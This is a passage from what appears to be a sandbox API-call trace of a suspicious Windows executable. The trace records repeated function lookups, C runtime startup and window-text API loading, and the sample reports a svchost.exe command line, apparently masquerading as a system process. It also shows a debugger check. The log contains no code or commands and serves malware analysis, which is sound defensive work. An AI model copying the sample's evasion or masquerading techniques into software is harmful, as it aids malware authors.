lpProcName="AddVectoredExceptionHandler") returned 0x7ffb28b72650 [0184.401] ResetEvent (hEvent=0x8) returned 1 [0184.401] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.405] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleHandleA") returned 0x7ffb26254c90 [0184.405] ResetEvent (hEvent=0x8) returned 1 [0184.405] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.409] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0184.409] ResetEvent (hEvent=0x8) returned 1 [0184.409] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.456] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetFilePointerEx") returned 0x7ffb2625dc70 [0184.456] ResetEvent (hEvent=0x8) returned 1 [0184.456] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.459] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileW") returned 0x7ffb2625d8b0 [0184.459] ResetEvent (hEvent=0x8) returned 1 [0184.459] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.462] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WriteConsoleW") returned 0x7ffb2625e050 [0184.462] ResetEvent (hEvent=0x8) returned 1 [0184.462] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.464] GetProcAddress (hModule=0x7ffb26230000, lpProcName="DeleteCriticalSection") returned 0x7ffb28b599d0 [0184.464] ResetEvent (hEvent=0x8) returned 1 [0184.464] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.467] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0184.467] ResetEvent (hEvent=0x8) returned 1 [0184.467] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.470] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0184.470] ResetEvent (hEvent=0x8) returned 1 [0184.470] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.474] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EncodePointer") returned 0x7ffb28b72780 [0184.474] ResetEvent (hEvent=0x8) returned 1 [0184.474] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.477] GetProcAddress (hModule=0x7ffb26230000, lpProcName="DecodePointer") returned 0x7ffb28b5c630 [0184.477] ResetEvent (hEvent=0x8) returned 1 [0184.477] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.480] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCPInfo") returned 0x7ffb262531e0 [0184.480] ResetEvent (hEvent=0x8) returned 1 [0184.480] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.483] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CompareStringW") returned 0x7ffb26252ce0 [0184.483] ResetEvent (hEvent=0x8) returned 1 [0184.483] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.486] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LCMapStringW") returned 0x7ffb2624dd00 [0184.486] ResetEvent (hEvent=0x8) returned 1 [0184.486] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.488] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetLocaleInfoW") returned 0x7ffb262572a0 [0184.488] ResetEvent (hEvent=0x8) returned 1 [0184.488] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.491] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7ffb2625d750 [0184.491] ResetEvent (hEvent=0x8) returned 1 [0184.491] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.493] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsAlloc") returned 0x7ffb26253ad0 [0184.494] ResetEvent (hEvent=0x8) returned 1 [0184.494] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.497] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsGetValue") returned 0x7ffb2624b450 [0184.497] ResetEvent (hEvent=0x8) returned 1 [0184.497] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.499] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsSetValue") returned 0x7ffb2624b7d0 [0184.499] ResetEvent (hEvent=0x8) returned 1 [0184.499] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.502] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TlsFree") returned 0x7ffb26253e40 [0184.502] ResetEvent (hEvent=0x8) returned 1 [0184.502] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.505] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetSystemTimeAsFileTime") returned 0x7ffb2624df70 [0184.505] ResetEvent (hEvent=0x8) returned 1 [0184.505] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.531] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleHandleW") returned 0x7ffb26253d40 [0184.531] ResetEvent (hEvent=0x8) returned 1 [0184.531] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.534] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetStringTypeW") returned 0x7ffb26254bf0 [0184.534] ResetEvent (hEvent=0x8) returned 1 [0184.534] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.537] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlCaptureContext") returned 0x7ffb2625d410 [0184.537] ResetEvent (hEvent=0x8) returned 1 [0184.537] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.539] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlLookupFunctionEntry") returned 0x7ffb26256e60 [0184.540] ResetEvent (hEvent=0x8) returned 1 [0184.540] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.546] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlVirtualUnwind") returned 0x7ffb2625a410 [0184.546] ResetEvent (hEvent=0x8) returned 1 [0184.546] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.548] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsDebuggerPresent") returned 0x7ffb26257460 [0184.548] ResetEvent (hEvent=0x8) returned 1 [0184.548] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.551] GetProcAddress (hModule=0x7ffb26230000, lpProcName="UnhandledExceptionFilter") returned 0x7ffb26276a20 [0184.551] ResetEvent (hEvent=0x8) returned 1 [0184.551] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.555] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetUnhandledExceptionFilter") returned 0x7ffb26256ea0 [0184.555] ResetEvent (hEvent=0x8) returned 1 [0184.555] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.557] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetStartupInfoW") returned 0x7ffb26254c00 [0184.557] ResetEvent (hEvent=0x8) returned 1 [0184.557] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.560] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsProcessorFeaturePresent") returned 0x7ffb26253d30 [0184.560] ResetEvent (hEvent=0x8) returned 1 [0184.560] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.563] GetProcAddress (hModule=0x7ffb26230000, lpProcName="QueryPerformanceCounter") returned 0x7ffb2624b720 [0184.563] ResetEvent (hEvent=0x8) returned 1 [0184.563] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.566] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcessId") returned 0x7ffb2624b4a0 [0184.566] ResetEvent (hEvent=0x8) returned 1 [0184.566] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.569] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentThreadId") returned 0x7ffb2624b460 [0184.569] ResetEvent (hEvent=0x8) returned 1 [0184.569] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.571] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeSListHead") returned 0x7ffb28b721c0 [0184.571] ResetEvent (hEvent=0x8) returned 1 [0184.571] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.574] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCurrentProcess") returned 0x7ffb2624b7c0 [0184.574] ResetEvent (hEvent=0x8) returned 1 [0184.574] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.577] GetProcAddress (hModule=0x7ffb26230000, lpProcName="TerminateProcess") returned 0x7ffb26258cf0 [0184.577] ResetEvent (hEvent=0x8) returned 1 [0184.577] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.579] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlUnwindEx") returned 0x7ffb26256ba0 [0184.579] ResetEvent (hEvent=0x8) returned 1 [0184.579] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.582] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RtlPcToFileHeader") returned 0x7ffb26255170 [0184.582] ResetEvent (hEvent=0x8) returned 1 [0184.582] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.585] GetProcAddress (hModule=0x7ffb26230000, lpProcName="RaiseException") returned 0x7ffb26254d70 [0184.585] ResetEvent (hEvent=0x8) returned 1 [0184.585] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.590] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InterlockedFlushSList") returned 0x7ffb28b72970 [0184.590] ResetEvent (hEvent=0x8) returned 1 [0184.590] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.592] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibrary") returned 0x7ffb26254810 [0184.592] ResetEvent (hEvent=0x8) returned 1 [0184.592] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.595] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryExW") returned 0x7ffb26250dd0 [0184.595] ResetEvent (hEvent=0x8) returned 1 [0184.595] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.598] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitProcess") returned 0x7ffb26254d80 [0184.598] ResetEvent (hEvent=0x8) returned 1 [0184.598] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.600] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleHandleExW") returned 0x7ffb26256b90 [0184.601] ResetEvent (hEvent=0x8) returned 1 [0184.601] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.603] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetModuleFileNameA") returned 0x7ffb26256e30 [0184.603] ResetEvent (hEvent=0x8) returned 1 [0184.603] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.606] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetACP") returned 0x7ffb2624d720 [0184.606] ResetEvent (hEvent=0x8) returned 1 [0184.606] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.635] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetStdHandle") returned 0x7ffb26253e80 [0184.635] ResetEvent (hEvent=0x8) returned 1 [0184.635] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.638] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileType") returned 0x7ffb2625dac0 [0184.638] ResetEvent (hEvent=0x8) returned 1 [0184.638] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.641] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsValidLocale") returned 0x7ffb26253a80 [0184.641] ResetEvent (hEvent=0x8) returned 1 [0184.641] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.644] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetUserDefaultLCID") returned 0x7ffb26253a70 [0184.644] ResetEvent (hEvent=0x8) returned 1 [0184.644] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0184.650] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnumSystemLocalesW") returned 0x7ffb26275d30 [0184.650] ResetEvent (hEvent=0x8) returned 1 [0184.650] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0185.726] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindClose") returned 0x7ffb2625d900 [0185.726] ResetEvent (hEvent=0x8) returned 1 [0185.726] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0185.730] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindFirstFileExA") returned 0x7ffb2625d950 [0185.730] ResetEvent (hEvent=0x8) returned 1 [0185.730] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0185.733] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0185.733] ResetEvent (hEvent=0x8) returned 1 [0185.733] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0185.736] GetProcAddress (hModule=0x7ffb26230000, lpProcName="IsValidCodePage") returned 0x7ffb262531d0 [0185.736] ResetEvent (hEvent=0x8) returned 1 [0185.736] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0185.739] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetOEMCP") returned 0x7ffb2625c840 [0185.739] ResetEvent (hEvent=0x8) returned 1 [0185.739] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0185.742] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCommandLineA") returned 0x7ffb26256d00 [0185.742] ResetEvent (hEvent=0x8) returned 1 [0185.742] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.003] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetCommandLineW") returned 0x7ffb26256a00 [0186.003] ResetEvent (hEvent=0x8) returned 1 [0186.003] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.006] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetEnvironmentStringsW") returned 0x7ffb26256790 [0186.006] ResetEvent (hEvent=0x8) returned 1 [0186.006] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.010] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeEnvironmentStringsW") returned 0x7ffb262567a0 [0186.010] ResetEvent (hEvent=0x8) returned 1 [0186.010] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.017] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x7ffb26090000 [0186.128] ResetEvent (hEvent=0x8) returned 1 [0186.128] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.131] GetProcAddress (hModule=0x7ffb26090000, lpProcName="GetWindowTextA") returned 0x7ffb260a5640 [0186.131] ResetEvent (hEvent=0x8) returned 1 [0186.131] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.134] GetProcAddress (hModule=0x7ffb26090000, lpProcName="GetWindowTextLengthA") returned 0x7ffb261181f0 [0186.134] ResetEvent (hEvent=0x8) returned 1 [0186.134] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.138] GetProcAddress (hModule=0x7ffb26090000, lpProcName="GetParent") returned 0x7ffb260af5d0 [0186.138] ResetEvent (hEvent=0x8) returned 1 [0186.138] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0186.306] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfea8 | out: lpSystemTimeAsFileTime=0xcfea8*(dwLowDateTime=0xfb8f8fcc, dwHighDateTime=0x1d7b3c9)) [0186.306] GetCurrentThreadId () returned 0xfac [0186.306] GetCurrentProcessId () returned 0x57c [0186.306] QueryPerformanceCounter (in: lpPerformanceCount=0xcfeb0 | out: lpPerformanceCount=0xcfeb0*=1540622554698) returned 1 [0186.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0186.306] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffb25207c50 [0186.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0186.306] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsAlloc") returned 0x7ffb25217e50 [0186.306] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsSetValue") returned 0x7ffb25203cb0 [0186.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0186.307] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffb25207c50 [0186.307] GetProcessHeap () returned 0x560000 [0186.307] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0186.307] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsAlloc") returned 0x7ffb25217e50 [0186.307] GetLastError () returned 0x36b7 [0186.307] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsGetValue") returned 0x7ffb251f3780 [0186.307] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="FlsSetValue") returned 0x7ffb25203cb0 [0186.307] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c8) returned 0x60b5a0 [0186.307] SetLastError (dwErrCode=0x36b7) [0186.307] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1000) returned 0x60b980 [0186.309] GetStartupInfoW (in: lpStartupInfo=0xcfd30 | out: lpStartupInfo=0xcfd30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0xcff30, hStdError=0x1)) [0186.309] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0186.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0186.309] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0186.309] GetCommandLineA () returned="C:\\Windows\\system32\\svchost.exe" [0186.309] GetCommandLineW () returned="C:\\Windows\\system32\\svchost.exe" [0186.309] GetACP () returned 0x4e4 [0186.309] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x228) returned 0x60c990 [0186.309] IsValidCodePage (CodePage=0x4e4) returned 1 [0186.309] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcfd00 | out: lpCPInfo=0xcfd00) returned 1 [0186.309] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcf5a0 | out: lpCPInfo=0xcf5a0) returned 1 [0186.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0186.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0xcf2f0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿC:\\Wꋀ耇\x01") returned 256 [0186.309] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿC:\\Wꋀ耇\x01", cchSrc=256, lpCharType=0xcf8c0 | out: lpCharType=0xcf8c0) returned 1 [0186.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0186.309] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcf5c0, cbMultiByte=256, lpWideCharStr=0xcf290, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0186.309] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffb251b0000 [0186.310] GetProcAddress (hModule=0x7ffb251b0000, lpProcName="LCMapStringEx") returned 0x7ffb251c5350 [0186.310] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0186.310] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 